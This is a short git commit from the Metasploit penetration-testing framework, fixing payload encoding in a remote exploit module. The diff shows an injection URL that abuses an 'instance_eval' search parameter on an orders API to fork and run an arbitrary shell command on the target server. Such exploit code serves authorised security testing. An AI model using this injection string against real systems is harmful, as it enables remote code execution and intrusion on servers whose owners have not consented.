fixup the payload encoding, per joernchen's comment in the #metasploit channel.

git-svn-id: file:///home/svn/framework3/trunk@13747 4d416f70-5f16-0410-b530-b9f4589650da
unstable
Jonathan Cran 2011-09-17 17:48:51 +00:00
parent 9ada448a16
commit 064255e910
1 changed files with 4 additions and 1 deletions

View File

@ -59,7 +59,10 @@ class Metasploit3 < Msf::Exploit::Remote
end end
def exploit def exploit
command = Rex::Text.uri_encode(payload.encoded) command = Rex::Text.uri_encode(payload.raw, 'hex-all')
puts command
urlconfigdir = datastore['URI'] + "api/orders.json?search[instance_eval]=Kernel.fork%20do%60#{command}%60end" urlconfigdir = datastore['URI'] + "api/orders.json?search[instance_eval]=Kernel.fork%20do%60#{command}%60end"
res = send_request_raw({ res = send_request_raw({
'uri' => urlconfigdir, 'uri' => urlconfigdir,